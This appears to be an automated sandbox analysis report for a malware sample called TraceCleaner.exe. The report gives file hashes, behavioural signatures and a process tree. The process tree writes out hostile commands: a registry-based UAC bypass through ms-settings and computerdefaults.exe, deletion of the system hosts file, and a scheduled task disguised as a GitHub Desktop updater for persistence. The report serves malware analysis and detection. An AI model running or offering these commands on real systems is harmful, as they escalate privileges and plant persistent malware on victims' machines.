Analysis
-
max time kernel
42s -
max time network
48s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
06-03-2024 19:05
Static task
static1
Behavioral task
behavioral1
Sample
TraceCleaner.exe
Resource
win7-20240221-en
General
-
Target
TraceCleaner.exe
-
Size
11KB
-
MD5
33fbca8dc3230e2c0c36678c787a63d8
-
SHA1
e5827fdc5262df48ab53d766a74f2a700cb6b049
-
SHA256
109b359176e064a3b40100491fbd3217a9a0b7027fd2fee05c5930a2df06770c
-
SHA512
299a4148337f46c32df4837bcf8dfa2d9984c1b174aec8052e8fd4d7b823b7a50f8f5c990f436578ed7f73a16cf77cced465262b22281d78fd53db0ef89cc6e0
-
SSDEEP
192:5x8JZ+SbRcum8HKH0BGEPEwzsrogKym+MKNA5jKmo:5xi+K88u0BGEsJogKyHMqAJKm
Malware Config
Extracted
gozi
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation TraceCleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 1 IoCs
pid Process 3032 TraceCleaner.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 34 raw.githubusercontent.com 35 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4984 schtasks.exe -
Modifies registry class 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\ms-settings\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\halfkyle53614797.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\ms-settings\shell\open\command reg.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 3032 TraceCleaner.exe Token: SeDebugPrivilege 4356 taskmgr.exe Token: SeSystemProfilePrivilege 4356 taskmgr.exe Token: SeCreateGlobalPrivilege 4356 taskmgr.exe Token: 33 4356 taskmgr.exe Token: SeIncBasePriorityPrivilege 4356 taskmgr.exe -
Suspicious use of FindShellTrayWindow 44 IoCs
pid Process 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe -
Suspicious use of SendNotifyMessage 44 IoCs
pid Process 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe 4356 taskmgr.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 3032 wrote to memory of 1920 3032 TraceCleaner.exe 99 PID 3032 wrote to memory of 1920 3032 TraceCleaner.exe 99 PID 3032 wrote to memory of 1920 3032 TraceCleaner.exe 99 PID 3032 wrote to memory of 1960 3032 TraceCleaner.exe 101 PID 3032 wrote to memory of 1960 3032 TraceCleaner.exe 101 PID 3032 wrote to memory of 1960 3032 TraceCleaner.exe 101 PID 3032 wrote to memory of 232 3032 TraceCleaner.exe 103 PID 3032 wrote to memory of 232 3032 TraceCleaner.exe 103 PID 3032 wrote to memory of 232 3032 TraceCleaner.exe 103 PID 232 wrote to memory of 4072 232 cmd.exe 105 PID 232 wrote to memory of 4072 232 cmd.exe 105 PID 232 wrote to memory of 4072 232 cmd.exe 105 PID 4072 wrote to memory of 2284 4072 ComputerDefaults.exe 106 PID 4072 wrote to memory of 2284 4072 ComputerDefaults.exe 106 PID 4072 wrote to memory of 2284 4072 ComputerDefaults.exe 106 PID 2284 wrote to memory of 2760 2284 wscript.exe 108 PID 2284 wrote to memory of 2760 2284 wscript.exe 108 PID 2284 wrote to memory of 2760 2284 wscript.exe 108 PID 3032 wrote to memory of 868 3032 TraceCleaner.exe 112 PID 3032 wrote to memory of 868 3032 TraceCleaner.exe 112 PID 3032 wrote to memory of 868 3032 TraceCleaner.exe 112 PID 868 wrote to memory of 4984 868 cmd.exe 114 PID 868 wrote to memory of 4984 868 cmd.exe 114 PID 868 wrote to memory of 4984 868 cmd.exe 114
Processes
-
C:\Users\Admin\AppData\Local\Temp\TraceCleaner.exe"C:\Users\Admin\AppData\Local\Temp\TraceCleaner.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\halfkyle53614797.vbs" /f2⤵
- Modifies registry class
PID:1920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f2⤵
- Modifies registry class
PID:1960
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C computerdefaults.exe2⤵
- Suspicious use of WriteProcessMemory
PID:232 -
C:\Windows\SysWOW64\ComputerDefaults.execomputerdefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\SysWOW64\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\halfkyle53614797.vbs4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts5⤵PID:2760
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN GitHubDesktopUpdater_ByDQCYCY0O0mF82xY050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\Shell\ByDQCYCY0O0mF82xY050MX.exe" /RL HIGHEST /IT2⤵
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /SC ONLOGON /TN GitHubDesktopUpdater_ByDQCYCY0O0mF82xY050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\Shell\ByDQCYCY0O0mF82xY050MX.exe" /RL HIGHEST /IT3⤵
- Creates scheduled task(s)
PID:4984
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4356
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD56f2fdecc48e7d72ca1eb7f17a97e59ad
SHA1fcbc8c4403e5c8194ee69158d7e70ee7dbd4c056
SHA25670e48ef5c14766f3601c97451b47859fddcbe7f237e1c5200cea8e7a7609d809
SHA512fea98a3d6fff1497551dc6583dd92798dcac764070a350fd381e856105a6411c94effd4b189b7a32608ff610422b8dbd6d93393c5da99ee66d4569d45191dc8b
-
Filesize
171B
MD5a34267102c21aff46aecc85598924544
SHA177268af47c6a4b9c6be7f7487b2c9b233d49d435
SHA256eba7ab5c248e46dbe70470b41ebf25a378b4eff9ce632adff927ac1f95583d44
SHA5125d320312b93b46c9051a20c82d6405a3f2c78b23adb3ab3e71aad854b65b500937de7ca2986cf79967386d689beecccf676d89afde8ecc5d5ad0cb4ae2bf38a3